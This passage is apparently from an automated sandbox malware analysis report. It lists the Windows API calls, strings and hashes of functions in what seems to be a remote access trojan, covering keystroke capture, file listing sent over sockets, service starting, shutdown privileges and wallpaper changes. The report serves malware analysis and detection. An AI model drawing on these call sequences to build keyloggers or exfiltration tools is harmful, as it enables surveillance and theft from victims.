                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
                                                                                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                                                                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2341273852-0
                                                                                                                                                                                      • Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                                                                                                                                                                      • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 0040A416
                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                                                                                                                                                      • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 0040A433
                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 0040A43E
                                                                                                                                                                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                                                                                                                                                                      • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                                                                                                                                                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1888522110-0
                                                                                                                                                                                      • Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                                                                                                                                                                      • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                                                                                                                                                                      • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 00449212
                                                                                                                                                                                      • _free.LIBCMT ref: 00449236
                                                                                                                                                                                      • _free.LIBCMT ref: 004493BD
                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                                                                                                                                                      • _free.LIBCMT ref: 00449589
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 314583886-0
                                                                                                                                                                                      • Opcode ID: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                                                                                                                                                                                      • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                                                                                                                                                                      • Opcode Fuzzy Hash: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                                                                                                                                                                                      • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                                                                                                                                                        • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                                                                                                                                                        • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                                                                                                                                                        • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                                                                                                                                                        • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                                                                                                                                                                      • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                                                                                                                                                                      • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                                                                                      • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                                                                                                                      • API String ID: 1589313981-2876530381
                                                                                                                                                                                      • Opcode ID: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                                                                                                                                                                                      • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                                                                                                                                                                      • Opcode Fuzzy Hash: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                                                                                                                                                                      • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InfoLocale
                                                                                                                                                                                      • String ID: ACP$OCP$['E
                                                                                                                                                                                      • API String ID: 2299586839-2532616801
                                                                                                                                                                                      • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                                                                                                                                      • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                                                                                                                                      • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                                                                                                                                                                      • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                                                                                                                                                                      • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                                      • String ID: http://geoplugin.net/json.gp
                                                                                                                                                                                      • API String ID: 3121278467-91888290
                                                                                                                                                                                      • Opcode ID: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                                                                                                                                                                                      • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                                                                                                                                                                      • Opcode Fuzzy Hash: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                                                                                                                                                                                      • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                                                                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041799D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                                      • API String ID: 3534403312-3733053543
                                                                                                                                                                                      • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                                                                                                                                      • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                                                                                                                                                                      • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 00409258
                                                                                                                                                                                        • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004093C1
                                                                                                                                                                                        • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                                                                                                                                                                        • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                                                                                                                                                                                        • Part of subcall function 00404E26: FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004095B9
                                                                                                                                                                                        • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                                                                                                                                                                        • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2435342581-0
                                                                                                                                                                                      • Opcode ID: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                                                                                                                                                                                      • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                                                                                                                                                                      • Opcode Fuzzy Hash: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                                                                                                                                                                                      • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                                                                                                                                                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                                                                                                                                                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 276877138-0
                                                                                                                                                                                      • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                                                                                                                                                                      • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                                                                                                                                                                      • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00413549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                                                                                                                                                                                        • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                                                                                                                                                                                        • Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592
                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040F8CA
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                                                      • String ID: 4.9.4 Pro$override$pth_unenc
                                                                                                                                                                                      • API String ID: 2281282204-930821335
                                                                                                                                                                                      • Opcode ID: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                                                                                                                                                                                      • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                                                                                                                                                                                      • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                      • String ID: SETTINGS
                                                                                                                                                                                      • API String ID: 3473537107-594951305
                                                                                                                                                                                      • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                                                                                                                                      • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 0040966A
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                                                                                                                                                                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1157919129-0
                                                                                                                                                                                      • Opcode ID: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                                                                                                                                                                                      • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                                                                                                                                                                      • Opcode Fuzzy Hash: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                                                                                                                                                                                      • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __EH_prolog.LIBCMT ref: 00408811
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                                                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1771804793-0
                                                                                                                                                                                      • Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                                                                                                                                                                      • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                                                                                                                                                                      • Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileFind$FirstNextsend
                                                                                                                                                                                      • String ID: XPG$XPG
                                                                                                                                                                                      • API String ID: 4113138495-1962359302
                                                                                                                                                                                      • Opcode ID: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                                                                                                                                                                                      • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                                                                                                                                                                      • Opcode Fuzzy Hash: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                                                                                                                                                                                      • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                                                                                                                                                                        • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                                                                                                                                                                        • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                                                                                                                                                                        • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                      • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                                      • API String ID: 4127273184-3576401099
                                                                                                                                                                                      • Opcode ID: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                                                                                                                                                                                      • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: PkGNG
                                                                                                                                                                                      • API String ID: 0-263838557
                                                                                                                                                                                      • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                                                                                                                                                                      • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                                                                                                                                                                                      • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
